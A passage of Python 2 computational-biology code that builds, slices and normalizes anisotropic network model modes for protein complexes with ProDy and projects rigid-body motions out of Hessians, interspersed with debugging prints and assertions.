#writePDB(reference.getTitle()+"forANMmoved.pdb", reference)
if self.utils.config.calculateZeroEigvalModes == True:
anm_reference = calcANM(reference, n_modes=numberOfModes, selstr=selstr, zeros=True)
else:
anm_reference = calcANM(reference, n_modes=numberOfModes, selstr=selstr)
# Extend the anm_reference on all atoms
anm_reference_extend = extendModel(anm_reference[0], anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched
if direct_call == None:
if self.bound_provided == True:
anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], ref_chain.getSelstr())
else:
anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], selstr)
else:
anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], selstr)
# Normalize the slices anm
anm_reference_slc = self.getNormalizedANM(anm_reference_slc)
if direct_call == True:
self._anm_reference = anm_reference
self._anm_reference_slc = anm_reference_slc
else:
return anm_reference, anm_reference_slc
def getNormalizedANM(self, anm):
""" Normalize the modes of the anm and return this anm object
Args:
anm: the anm with modes calculated
Returns: anm with normalized modes
"""
M = self.normalizeM(anm[0].getArray())
eigenvals = anm[0].getEigvals()
anm[0].setEigens(M, eigenvals)
return anm
def _moveSegment(self, reference, segment, angstrom):
""" Move all atoms x,y,z, belonging to the segment the number in angstrom """
print "15 ang contact before moving atoms:", reference.select('same residue as exwithin 15 of segment "L." ').numAtoms()
ref_select = reference.select('segment \"'+segment+'.\"')
ref_select.setCoords(ref_select.getCoords()+angstrom)
if reference.select('same residue as exwithin 15 of segment "L." ') != None:
print "15 ang contact after moving atoms: ", reference.select('same residue as exwithin 15 of segment "L." ').numAtoms()
else:
print "15 ang contact after moving atoms: 0"
def replaceReferenceANMs(self, anm_new, reference, ref_chain = None):
""" Replace the anm of reference with anm_new and normalize along the way.
Args:
anm_new: the new ANM
reference: the protein the ANM was created on
ref_chain: the matched chains of reference
Result:
replaced self._anm_reference and self._anm_reference_slc based on normalized anm_new
"""
self._anm_reference = anm_new
self._anm_reference = self.getNormalizedANM(self._anm_reference)
# Extend the self._anm_reference_tilde on all atoms
anm_reference_extend = extendModel(self._anm_reference[0], self._anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched
if ref_chain != None:
self._anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], ref_chain.getSelstr())
else:
self._anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], 'calpha')
self._anm_reference_slc = self.getNormalizedANM(self._anm_reference_slc)
def replaceComplexANMs(self, anm_new, proteinComplex, complex_chain = None):
""" Replace the anm of the complex with anm_new and normalize along the way.
Args:
anm_new: the new ANM
proteinComplex: the complex that the ANM was created on
complex_chain: the matched chains of the complex
Result:
replaced self._anm_complex and self._anm_complex_slc based on normalized anm_new
"""
self._anm_complex = anm_new
self._anm_complex = self.getNormalizedANM(self._anm_complex)
# Extend the self.self._anm_complex_tilde on all atoms
anm_complex_extend = extendModel(self._anm_complex[0], self._anm_complex[1], proteinComplex, norm=True)
# Then slice the anm_reference to the matched
if complex_chain != None:
self._anm_complex_slc = sliceModel(anm_complex_extend[0], anm_complex_extend[1], complex_chain.getSelstr())
else:
self._anm_complex_slc = sliceModel(anm_complex_extend[0], anm_complex_extend[1], complex_chain.getSelstr())
self._anm_complex_slc = self.getNormalizedANM(self._anm_complex_slc)
def calcANMSlcInterface(self, ref_chain_interface, reference, titleOfReferenceSingleProtein, isBoundComplex=False):
self._anm_slc_interface = self.getSlicedInterfaceANM(self.getANMExtend(), ref_chain_interface, reference, titleOfReferenceSingleProtein, isBoundComplex)
def getSlicedInterfaceANM(self, anm_ext, ref_chain_interface, reference, titleOfReferenceSingleProtein, isBoundComplex=False):
selectionAtoms = self.createSlcSelectionString(reference, isBoundComplex, ref_chain_interface, titleOfReferenceSingleProtein)
anm_slc_interface = sliceModel(anm_ext[0], anm_ext[1], selectionAtoms)
return anm_slc_interface
def calcInterfaceANMsforPart2a2k(self, encounter):
self._anm_reference_slc_interface = self._slicedInterfaceANMs(self._anm_reference, encounter.getMobile(), encounter.getMobChainInterface())
self._anm_counterpart_slc_interface = self._slicedInterfaceANMs(self._anm_counterpart, encounter.getBoundCounterpart(), encounter.getBoundCounterpartChainInterface())
self._anm_boundcomplex_slc_interface = self._slicedInterfaceANMs(self._anm_complex, encounter.boundComplex.complex , encounter.getBoundComplexChainInterface())
assert (self._anm_reference_slc_interface[1].numAtoms()
+ self._anm_counterpart_slc_interface[1].numAtoms()
== self._anm_boundcomplex_slc_interface[1].numAtoms())
for i in range(0, self._anm_reference_slc_interface[1].numAtoms()):
assert self._anm_reference_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][i].getResname()
assert np.alltrue(self._anm_reference_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][i].getCoords())
assert self._anm_reference_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][i].getName()
offsetAtoms = self._anm_reference_slc_interface[1].numAtoms()
for i in range(0, self._anm_counterpart_slc_interface[1].numAtoms()):
j = i + offsetAtoms
assert self._anm_counterpart_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][j].getResname()
assert np.alltrue(self._anm_counterpart_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][j].getCoords())
assert self._anm_counterpart_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][j].getName()
def calcInterfaceANMsUnified(self, reference, counterpart, proteinComplex, ref_chain_interface, counterpart_chain_interface, complex_chain_interface):
""" Calculate (slice) the ANMs according to the interfaces on prot1, prot2 and their complex representation.
Args:
reference: prot1
counterpart: prot2
proteinComplex: prot1 and prot2 as one parsed object
ref_chain_interface: interface of prot1
counterpart_chain_interface: interface of prot2
complex_chain_interface: interface of the proteinComplex
"""
self._anm_reference_slc_interface = self._slicedInterfaceANMs(self._anm_reference, reference, ref_chain_interface)
self._anm_counterpart_slc_interface = self._slicedInterfaceANMs(self._anm_counterpart, counterpart, counterpart_chain_interface)
self._anm_boundcomplex_slc_interface = self._slicedInterfaceANMs(self._anm_complex, proteinComplex, complex_chain_interface)
# normalize modes
self._anm_reference_slc_interface = self.getNormalizedANM(self._anm_reference_slc_interface)
self._anm_counterpart_slc_interface = self.getNormalizedANM(self._anm_counterpart_slc_interface)
self._anm_boundcomplex_slc_interface = self.getNormalizedANM(self._anm_boundcomplex_slc_interface)
assert (self._anm_reference_slc_interface[1].numAtoms()
+ self._anm_counterpart_slc_interface[1].numAtoms()
== self._anm_boundcomplex_slc_interface[1].numAtoms())
assertANMAtomEquality = False
if assertANMAtomEquality:
if self.utils.isReceptor(reference.getTitle()):
for i in range(0, self._anm_reference_slc_interface[1].numAtoms()):
# print i, self._anm_reference_slc_interface[1][i].getCoords(), self._anm_boundcomplex_slc_interface[1][i].getCoords()
assert self._anm_reference_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][i].getResname()
assert np.alltrue(self._anm_reference_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][i].getCoords())
# item1roundedChoords = [round(x, 3) for x in self._anm_reference_slc_interface[1][i].getCoords().tolist()]
# item2roundedChoords = [round(x, 3) for x in self._anm_boundcomplex_slc_interface[1][i].getCoords().tolist()]
# assert np.alltrue(item1roundedChoords == item2roundedChoords)
assert self._anm_reference_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][i].getName()
offsetAtoms = self._anm_reference_slc_interface[1].numAtoms()
for i in range(0, self._anm_counterpart_slc_interface[1].numAtoms()):
j = i + offsetAtoms
assert self._anm_counterpart_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][j].getResname()
assert np.alltrue(self._anm_counterpart_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][j].getCoords())
# item1roundedChoords = [round(x, 3) for x in self._anm_counterpart_slc_interface[1][i].getCoords().tolist()]
# item2roundedChoords = [round(x, 3) for x in self._anm_boundcomplex_slc_interface[1][j].getCoords().tolist()]
# assert np.alltrue(item1roundedChoords == item2roundedChoords)
assert self._anm_counterpart_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][j].getName()
else:
offsetAtoms = self._anm_counterpart_slc_interface[1].numAtoms()
for i in range(0, self._anm_reference_slc_interface[1].numAtoms()):
j = i + offsetAtoms
# print i, self._anm_reference_slc_interface[1][i].getCoords(), self._anm_boundcomplex_slc_interface[1][i].getCoords()
assert self._anm_reference_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][j].getResname()
assert np.alltrue(self._anm_reference_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][j].getCoords())
# item1roundedChoords = [round(x, 3) for x in self._anm_reference_slc_interface[1][i].getCoords().tolist()]
# item2roundedChoords = [round(x, 3) for x in self._anm_boundcomplex_slc_interface[1][j].getCoords().tolist()]
# assert np.alltrue(item1roundedChoords == item2roundedChoords)
assert self._anm_reference_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][j].getName()
for i in range(0, self._anm_counterpart_slc_interface[1].numAtoms()):
assert self._anm_counterpart_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][i].getResname()
assert np.alltrue(self._anm_counterpart_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][i].getCoords())
# item1roundedChoords = [round(x, 3) for x in self._anm_counterpart_slc_interface[1][i].getCoords().tolist()]
# item2roundedChoords = [round(x, 3) for x in self._anm_boundcomplex_slc_interface[1][i].getCoords().tolist()]
# assert np.alltrue(item1roundedChoords == item2roundedChoords)
assert self._anm_counterpart_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][i].getName()
def _slicedInterfaceANMs(self, anm, reference, interface):
""" Slice an anm to match the provided interface.
Args:
anm: the anm to be sliced
reference: the protein that the anm is based upon, necessary for extention of the model first
interface: the interface of the protein
"""
anm_ext = extendModel(anm[0], anm[1], reference, norm=True)
anm_slc = sliceModel(anm_ext[0], anm_ext[1], interface.getSelstr())
anm_slc = self.getNormalizedANM(anm_slc)
return anm_slc
def getANM(self):
""" Get the ANM calculated on the reference (default) calpha atoms. """
if self._anm == None:
raise Exception('self._anm == None')
return self._anm
def getANMExtend(self):
""" Get the ANM extended to the whole reference (all atoms). """
if self._anm_extend == None:
raise Exception('self._anm == None')
return self._anm_extend
def getANMSlc(self):
""" Get the sliced back ANM to match all atoms in the ref_chain."""
if self._anm_slc == None:
raise Exception('self._anm_slc == None')
return self._anm_slc
def getANMSlcCounterpart(self):
""" Get the sliced back ANM to match all atoms in the counterpart chain(s) """
if self._anm_slc_counterpart == None:
raise Exception('self._anm_slc == None')
return self._anm_slc_counterpart
def getANMSlcInterface(self):
""" Get the sliced back ANM to match all atoms in the ref_chain_interface. """
if self._anm_slc_interface == None:
raise Exception('self._anm_slc_interface == None')
return self._anm_slc_interface
def getANMComplexSlc(self):
""" Get the sliced back ANM to match all atoms in the chain_complex. """
if self._anm_complex_slc == None:
raise Exception('self._anm_complex_slc == None')
return self._anm_complex_slc
def getANMReference2a2kSlc(self):
""" Get the sliced back self._anm_reference_slc ANM to match all atoms in the reference variable. """
if self._anm_reference_slc == None:
raise Exception('self._anm_reference_slc == None')
return self._anm_reference_slc
def getANMCounterpart2a2kSlc(self):
""" Get the sliced back self._anm_counterpart_slc ANM to match all atoms in the counterpart variable. """
if self._anm_counterpart_slc == None:
raise Exception('self._anm_counterpart_slc == None')
return self._anm_counterpart_slc
def getANMReference(self):
if self._anm_reference == None:
raise Exception('self._anm_reference == None')
return self._anm_reference
def getANMReferenceSlc(self):
if self._anm_reference_slc == None:
raise Exception('self._anm_reference_slc == None')
return self._anm_reference_slc
def getANMCounterpart(self):
if self._anm_counterpart == None:
raise Exception('self._anm_counterpart == None')
return self._anm_counterpart
def getANMComplex(self):
if self._anm_complex == None:
raise Exception('self._anm_complex == None')
return self._anm_complex
def getANMReferenceSlcInterface(self):
if self._anm_reference_slc_interface == None:
raise Exception('self._anm_reference_slc_interface == None')
return self._anm_reference_slc_interface
def getANMCounterpartSlcInterface(self):
if self._anm_counterpart_slc_interface == None:
raise Exception('self._anm_counterpart_slc_interface == None')
return self._anm_counterpart_slc_interface
def getANMComplexSlcInterface(self):
if self._anm_boundcomplex_slc_interface == None:
raise Exception('self._anm_boundcomplex_slc_interface == None')
return self._anm_boundcomplex_slc_interface
def getANMPath(self, reference, numberOfModes, selstr, whatAtomsToMatch, modified=""):
path = self.utils.config.anmPath
prefix = reference.getTitle()
prefix = prefix.replace(" ", "_")
if modified == "":
return path+prefix+"_modes"+str(numberOfModes)+"_buildOn"+selstr+"_matchedOn"+whatAtomsToMatch
elif modified == "extended":
return path+"extended/"+prefix+"_modes"+str(numberOfModes)+"_buildOn"+selstr+"_matchedOn"+whatAtomsToMatch+"_extended"
elif modified == "slicedback":
return path+"slicedback/"+prefix+"_modes"+str(numberOfModes)+"_buildOn"+selstr+"_matchedOn"+whatAtomsToMatch+"_slicedback"
else:
raise Exception("the variable modified is not the empty string, extended or slicedback.")
def doesANMExist(self, reference, numberOfModes, selstr, whatAtomsToMatch, modified=""):
path = self.utils.config.anmPath
try:
with open(self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified)+".anm.npz"):
return True
except IOError:
return False
def projectHessian(self, hessian, reference, proteinComplex, referenceSegment, projectionStyle, projectOnlyReferencePartOfHC=False, interCalphaIndices=None):
""" Return the PH'P hessian which has 6 zero eigenvalues according to the formula 8.27
from the book "A practical introduction to the simulation of molecular dynamics", Field.
However, here it is made sure that the assumed basis is orthonormal via np.linalg.qr applied
on the six vectors discussed in this book.
Args:
hessian: the hessian to be projected
reference: the protein the hessian or HRtilde/HLtilde of the hessian was created on
proteinComplex: the whole protein that reference is part of
referenceSegment: if reference is receptor, provide "R", else it needs to be ligand, provide "L"
projectionStyle: project away from "full" (intra+inter) or "intra" (intra) or "fullComplex"
pojectOnlyReferencePartOfHC: if true, the hessian was created on reference, if false, HRtilde or HLtilde
of the hessian were created on the reference
interCalphaIndices: list of calphas indices that have intermolecular interactions
Returns: projected hessian with 6 external degrees of freedom (rotation and translation) removed
"""
assert projectionStyle == "full" or projectionStyle == "intra" or projectionStyle == "fullComplex"
normalize = True
numAtoms = reference.select('calpha').numAtoms()
numCoords = numAtoms*3
centerOfCoords = calcCenter(reference.select('calpha'))
assert np.alltrue(centerOfCoords == calcCenter(proteinComplex.select('segment \"'+referenceSegment+'.\"').select('calpha')))
print "before projection symmetry ==, allclose: ", np.all(hessian-hessian.T==0), np.allclose(hessian, hessian.T)
if projectOnlyReferencePartOfHC:
numComplexAtoms = proteinComplex.select('calpha').numAtoms()
numComplexCoords = numComplexAtoms*3
numCounterpartCoords = numComplexCoords - numCoords
if referenceSegment == "R":
assert numCounterpartCoords == proteinComplex.select('segment \"L.\"').select('calpha').numAtoms() * 3
else:
assert numCounterpartCoords == proteinComplex.select('segment \"R.\"').select('calpha').numAtoms() * 3
# Create null vector with length of the counterpart calphas
counterPartNullVector = np.zeros(numCounterpartCoords)
# Create I
I = np.identity(numCoords)
# Create the three translation vectors Tx, Ty, Tz
Tx = np.zeros(numCoords)
Tx = self.utils.fill3DArrayWithValue(Tx, 1.0, 0)
Ty = np.zeros(numCoords)
Ty = self.utils.fill3DArrayWithValue(Ty, 1.0, 1)
Tz = np.zeros(numCoords)
Tz = self.utils.fill3DArrayWithValue(Tz, 1.0, 2)
# Create the three rotation vectors Rx, Ry, Rz
coordsCopy = reference.select('calpha').getCoords().copy()
Rx = self.utils.createRx(coordsCopy)
coordsCopy2 = reference.select('calpha').getCoords().copy()
Ry = self.utils.createRy(coordsCopy2)
coordsCopy3 = reference.select('calpha').getCoords().copy()
Rz = self.utils.createRz(coordsCopy3)
# remove inter atoms from projection
if projectionStyle == "intra":
Tx = self.removeInterAtoms(Tx, interCalphaIndices)
Ty = self.removeInterAtoms(Ty, interCalphaIndices)
Tz = self.removeInterAtoms(Tz, interCalphaIndices)
Rx = self.removeInterAtoms(Rx, interCalphaIndices)
Ry = self.removeInterAtoms(Ry, interCalphaIndices)
Rz = self.removeInterAtoms(Rz, interCalphaIndices)
if projectOnlyReferencePartOfHC:
# overwrite previous I
I = np.identity(numComplexCoords)
# extend (with the nullvector) the rotational and translational vectors to the dimension of the complex
if referenceSegment == "R":
Tx = np.concatenate((Tx, counterPartNullVector))
Ty = np.concatenate((Ty, counterPartNullVector))
Tz = np.concatenate((Tz, counterPartNullVector))
Rx = np.concatenate((Rx, counterPartNullVector))
Ry = np.concatenate((Ry, counterPartNullVector))
Rz = np.concatenate((Rz, counterPartNullVector))
else:
Tx = np.concatenate((counterPartNullVector, Tx))
Ty = np.concatenate((counterPartNullVector, Tz))
Tz = np.concatenate((counterPartNullVector, Tz))
Rx = np.concatenate((counterPartNullVector, Rx))
Ry = np.concatenate((counterPartNullVector, Ry))
Rz = np.concatenate((counterPartNullVector, Rz))
# Normalize translation vectors and apply rotational fix
if normalize:
Tx = Vector(Tx)
#Tx = self.subtractCenterOfCoords(Tx, centerOfCoords[0], 0.0, 0.0)
Tx = Tx.getNormed().getArray()
Ty = Vector(Ty)
#Ty = self.subtractCenterOfCoords(Ty, 0.0, centerOfCoords[1], 0.0)
Ty = Ty.getNormed().getArray()
Tz = Vector(Tz)
#Tz = self.subtractCenterOfCoords(Tz, 0.0, 0.0, centerOfCoords[2])
Tz = Tz.getNormed().getArray()
Rx = Vector(Rx)
#Rx = self.subtractCenterOfCoords(Rx, 0.0, centerOfCoords[2], centerOfCoords[1])
Rx = Rx.getNormed().getArray()
Ry = Vector(Ry)
#Ry = self.subtractCenterOfCoords(Ry, centerOfCoords[2], 0.0, centerOfCoords[0])
Ry = Ry.getNormed().getArray()
Rz = Vector(Rz)
#Rz = self.subtractCenterOfCoords(Rz, centerOfCoords[1], centerOfCoords[0], 0.0)
Rz = Rz.getNormed().getArray()
# Create P
#P = I - np.outer(Rx, Rx) - np.outer(Ry, Ry) - np.outer(Rz, Rz) - np.outer(Tx, Tx) - np.outer(Ty, Ty) - np.outer(Tz, Tz)
### corres P = I - P
#print "independent columns P: ", self.utils.independent_columns(P).shape
#print "matrix rank P: ", self.utils.matrixrank(P)
#print "independent columns I-P: ", self.utils.independent_columns(I-P).shape
#print "matrix rank I-P: ", self.utils.matrixrank(I-P)
#print "np matrix rank I-P : ", np.linalg.matrix_rank(I-P)
#print "np matrix as matrix rank I-P : ", np.linalg.matrix_rank(np.matrix(I-P))
assumedBasis = np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T
MyQ, MyR = np.linalg.qr(assumedBasis)
#print "MyQ.shape: ", MyQ.shape
Rx = MyQ.T[0]
Ry = MyQ.T[1]
Rz = MyQ.T[2]
Tx = MyQ.T[3]
Ty = MyQ.T[4]
Tz = MyQ.T[5]
###
print "before full projection"
###
P = I - np.outer(Rx, Rx) - np.outer(Ry, Ry) - np.outer(Rz, Rz) - np.outer(Tx, Tx) - np.outer(Ty, Ty) - np.outer(Tz, Tz)
#print "assumedBasis : \n", assumedBasis.round(4)
#print "basis after QR: \n", np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T.round(4)
#writeArray("assumedBasis.txt", assumedBasis.round(4), format="%f")
#writeArray("basis_after_QR.txt", np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T.round(4), format="%f")
###
#print "P", P
# print "P.shape", P.shape
# print "symmetric P: ", np.allclose(P, P.T)
# print "complex calphas * 3: ", proteinComplex.select('calpha').numAtoms() * 3
# print "rank of P projection", projectionStyle, ": ", np.linalg.matrix_rank(np.matrix(P))
# P_eigenvals, P_eigenvecs = np.linalg.eigh(P)
# print "number of P_eigenvals: ", len(P_eigenvals)
# #print "P_eigenvals: ", P_eigenvals
# print "number of P_eigenvecs: ", len(P_eigenvecs)
# #print "P_eigenvecs: ", P_eigenvecs
# #writeArray("helperScripts/"+proteinComplex.getTitle()+"_P_"+projectionStyle+".txt", P, format='%10.7f')
# #writeArray("P_eigenvals"+projectionStyle+".txt", P_eigenvals, format='%10.7f')
# #writeArray("P_eigenvecs"+projectionStyle+".txt", P_eigenvecs, format='%10.7f')
#
# P_times_Peigenvecs = P.dot(P_eigenvecs)
# P_times_Peigenvecs_T = P.dot(P_eigenvecs).T
# P_orthonormalityTest = P_times_Peigenvecs_T.dot(P_times_Peigenvecs)
# #writeArray("P_orthonormalityTest"+projectionStyle+".txt", P_orthonormalityTest, format='%10.7f')
# # does this P_orthonormalityTest equal the identity matrix or part of it?
# print "P_orthonormalityTest: ", np.allclose(P_orthonormalityTest, np.identity(len(P_eigenvecs)))
# print "P_orthonormalityTest w/o upper 6x6: ", np.allclose(P_orthonormalityTest[6:,6:], np.identity(len(P_eigenvecs)-6))
# zeroM = np.zeros((len(P_eigenvecs), len(P_eigenvecs)))
# zeroM[6:,6:] = P_orthonormalityTest[6:,6:]
# print "P_orthonormalityTest except lower n-6,n-6 zero: ", np.allclose(P_orthonormalityTest, zeroM)
# proteinComplex_ca = proteinComplex.select('calpha')
# writePDB("complex_allatoms.pdb", proteinComplex)
# writePDB("complex_before_Ptimes.pdb", proteinComplex_ca)
# coord_shape = proteinComplex_ca.getCoords().shape
# coords_P = P.dot(proteinComplex_ca.getCoords().flatten())
# coords_P = coords_P.reshape(coord_shape)
# proteinComplex_ca.setCoords(coords_P)
# writePDB("complex_after_Ptimes"+projectionStyle+".pdb", proteinComplex_ca)
#raw_input()
###
# Q, R = np.linalg.qr(P, mode="complete")
# print "independent columns Q: ", self.utils.independent_columns(Q).shape
# print "matrix rank Q: ", self.utils.matrixrank(Q)
# print "matrix np rank Q: ", np.linalg.matrix_rank(Q)," ", np.linalg.matrix_rank(np.matrix(Q))
# print "log of determinant of Q: ", np.linalg.slogdet(Q)
### corres Q = I - Q
#P = I-Q
# Apply PH'H, np.dot is matrix multiplication for 2D arrays
#print "count orthogonal columns: ", self.utils.countOrthogonalColumns(I-P)
Hprime = np.dot(P.T, hessian)
Hprime = np.dot(Hprime, P)
# Return the projected hessian
#print "after projection symmetry ==, allclose: ", np.all(Hprime-Hprime.T==0), np.allclose(Hprime, Hprime.T)
#print "H: ", hessian
#print "Hprime: ", Hprime
return Hprime
def projectHessian_test2timesQR(self, hessian, reference, proteinComplex, referenceSegment, projectionStyle, projectOnlyReferencePartOfHC=False, interCalphaIndices=None):
""" Return the PH'P hessian which has 6 zero eigenvalues according to the formula 8.27
from the book "A practical introduction to the simulation of molecular dynamics", Field.
However, here it is made sure that the assumed basis is orthonormal via np.linalg.qr applied
on the six vectors discussed in this book.
Args:
hessian: the hessian to be projected
reference: the protein the hessian or HRtilde/HLtilde of the hessian was created on
proteinComplex: the whole protein that reference is part of
referenceSegment: if reference is receptor, provide "R", else it needs to be ligand, provide "L"
projectionStyle: project away from "full" (intra+inter) or "intra" (intra) or "fullComplex"
pojectOnlyReferencePartOfHC: if true, the hessian was created on reference, if false, HRtilde or HLtilde
of the hessian were created on the reference
interCalphaIndices: list of calphas indices that have intermolecular interactions
Returns: projected hessian with 6 external degrees of freedom (rotation and translation) removed
"""
assert projectionStyle == "full"
normalize = True
numAtoms = reference.select('calpha').numAtoms()
numCoords = numAtoms*3
centerOfCoords = calcCenter(reference.select('calpha'))
assert np.alltrue(centerOfCoords == calcCenter(proteinComplex.select('segment \"'+referenceSegment+'.\"').select('calpha')))
print "before projection symmetry ==, allclose: ", np.all(hessian-hessian.T==0), np.allclose(hessian, hessian.T)
numComplexAtoms = proteinComplex.select('calpha').numAtoms()
numComplexCoords = numComplexAtoms*3
numCounterpartCoords = numComplexCoords - numCoords
if referenceSegment == "R":
assert numCounterpartCoords == proteinComplex.select('segment \"L.\"').select('calpha').numAtoms() * 3
else:
assert numCounterpartCoords == proteinComplex.select('segment \"R.\"').select('calpha').numAtoms() * 3
# Create null vector with length of the counterpart calphas
counterPartNullVector = np.zeros(numCounterpartCoords)
# Create I
I = np.identity(numComplexCoords)
# Create the three translation vectors Tx, Ty, Tz
Tx = np.zeros(numComplexCoords)
Tx = self.utils.fill3DArrayWithValue(Tx, 1.0, 0)
Ty = np.zeros(numComplexCoords)
Ty = self.utils.fill3DArrayWithValue(Ty, 1.0, 1)
Tz = np.zeros(numComplexCoords)
Tz = self.utils.fill3DArrayWithValue(Tz, 1.0, 2)
# Create the three rotation vectors Rx, Ry, Rz
coordsCopy = proteinComplex.select('calpha').getCoords().copy()
Rx = self.utils.createRx(coordsCopy)
coordsCopy2 = proteinComplex.select('calpha').getCoords().copy()
Ry = self.utils.createRy(coordsCopy2)
coordsCopy3 = proteinComplex.select('calpha').getCoords().copy()
Rz = self.utils.createRz(coordsCopy3)
# if projectOnlyReferencePartOfHC:
# # overwrite previous I
# I = np.identity(numComplexCoords)
# # extend (with the nullvector) the rotational and translational vectors to the dimension of the complex
# if referenceSegment == "R":
# Tx = np.concatenate((Tx, counterPartNullVector))
# Ty = np.concatenate((Ty, counterPartNullVector))
# Tz = np.concatenate((Tz, counterPartNullVector))
# Rx = np.concatenate((Rx, counterPartNullVector))
# Ry = np.concatenate((Ry, counterPartNullVector))
# Rz = np.concatenate((Rz, counterPartNullVector))
# else:
# Tx = np.concatenate((counterPartNullVector, Tx))
# Ty = np.concatenate((counterPartNullVector, Tz))
# Tz = np.concatenate((counterPartNullVector, Tz))
# Rx = np.concatenate((counterPartNullVector, Rx))
# Ry = np.concatenate((counterPartNullVector, Ry))
# Rz = np.concatenate((counterPartNullVector, Rz))
# Normalize translation vectors and apply rotational fix
if normalize:
Tx = Vector(Tx)
#Tx = self.subtractCenterOfCoords(Tx, centerOfCoords[0], 0.0, 0.0)
Tx = Tx.getNormed().getArray()
Ty = Vector(Ty)
#Ty = self.subtractCenterOfCoords(Ty, 0.0, centerOfCoords[1], 0.0)
Ty = Ty.getNormed().getArray()
Tz = Vector(Tz)
#Tz = self.subtractCenterOfCoords(Tz, 0.0, 0.0, centerOfCoords[2])
Tz = Tz.getNormed().getArray()
Rx = Vector(Rx)
#Rx = self.subtractCenterOfCoords(Rx, 0.0, centerOfCoords[2], centerOfCoords[1])
Rx = Rx.getNormed().getArray()
Ry = Vector(Ry)
#Ry = self.subtractCenterOfCoords(Ry, centerOfCoords[2], 0.0, centerOfCoords[0])
Ry = Ry.getNormed().getArray()
Rz = Vector(Rz)
#Rz = self.subtractCenterOfCoords(Rz, centerOfCoords[1], centerOfCoords[0], 0.0)
Rz = Rz.getNormed().getArray()
assumedBasis = np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T
MyQ, MyR = np.linalg.qr(assumedBasis, mode='full')
Rx = MyQ.T[0]
Ry = MyQ.T[1]
Rz = MyQ.T[2]
Tx = MyQ.T[3]
Ty = MyQ.T[4]
Tz = MyQ.T[5]
Rx = Rx[:numCoords]
Ry = Ry[:numCoords]
Rz = Rz[:numCoords]
Tx = Tx[:numCoords]
Ty = Ty[:numCoords]
Tz = Tz[:numCoords]
assumedBasis = np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T
MyQ, MyR = np.linalg.qr(assumedBasis, mode='full')
Rx = MyQ.T[0]
Ry = MyQ.T[1]
Rz = MyQ.T[2]
Tx = MyQ.T[3]
Ty = MyQ.T[4]
Tz = MyQ.T[5]
print "len(Rx): ", len(Rx)
Tx = np.concatenate((Tx, counterPartNullVector))
Ty = np.concatenate((Ty, counterPartNullVector))
Tz = np.concatenate((Tz, counterPartNullVector))
Rx = np.concatenate((Rx, counterPartNullVector))
Ry = np.concatenate((Ry, counterPartNullVector))
Rz = np.concatenate((Rz, counterPartNullVector))
print "Pr test"
raw_input()
P = I - np.outer(Rx, Rx) - np.outer(Ry, Ry) - np.outer(Rz, Rz) - np.outer(Tx, Tx) - np.outer(Ty, Ty) - np.outer(Tz, Tz)
#print "assumedBasis : \n", assumedBasis.round(4)
#print "basis after QR: \n", np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T.round(4)
#writeArray("assumedBasis.txt", assumedBasis.round(4), format="%f")
#writeArray("basis_after_QR.txt", np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T.round(4), format="%f")
###
print "P", P
print "P.shape", P.shape
print "symmetric P: ", np.allclose(P, P.T)
print "complex calphas * 3: ", proteinComplex.select('calpha').numAtoms() * 3
print "rank of P projection", projectionStyle, ": ", np.linalg.matrix_rank(np.matrix(P))
P_eigenvals, P_eigenvecs = np.linalg.eigh(P)
print "number of P_eigenvals: ", len(P_eigenvals)
#print "P_eigenvals: ", P_eigenvals
print "number of P_eigenvecs: ", len(P_eigenvecs)
#print "P_eigenvecs: ", P_eigenvecs
writeArray("helperScripts/"+proteinComplex.getTitle()+"_P_"+projectionStyle+".txt", P, format='%10.7f')
#writeArray("P_eigenvals"+projectionStyle+".txt", P_eigenvals, format='%10.7f')
#writeArray("P_eigenvecs"+projectionStyle+".txt", P_eigenvecs, format='%10.7f')
P_times_Peigenvecs = P.dot(P_eigenvecs)
P_times_Peigenvecs_T = P.dot(P_eigenvecs).T
P_orthonormalityTest = P_times_Peigenvecs_T.dot(P_times_Peigenvecs)
#writeArray("P_orthonormalityTest"+projectionStyle+".txt", P_orthonormalityTest, format='%10.7f')
# does this P_orthonormalityTest equal the identity matrix or part of it?
print "P_orthonormalityTest: ", np.allclose(P_orthonormalityTest, np.identity(len(P_eigenvecs)))
print "P_orthonormalityTest w/o upper 6x6: ", np.allclose(P_orthonormalityTest[6:,6:], np.identity(len(P_eigenvecs)-6))
zeroM = np.zeros((len(P_eigenvecs), len(P_eigenvecs)))
zeroM[6:,6:] = P_orthonormalityTest[6:,6:]
print "P_orthonormalityTest except lower n-6,n-6 zero: ", np.allclose(P_orthonormalityTest, zeroM)
# proteinComplex_ca = proteinComplex.select('calpha')
# writePDB("complex_allatoms.pdb", proteinComplex)
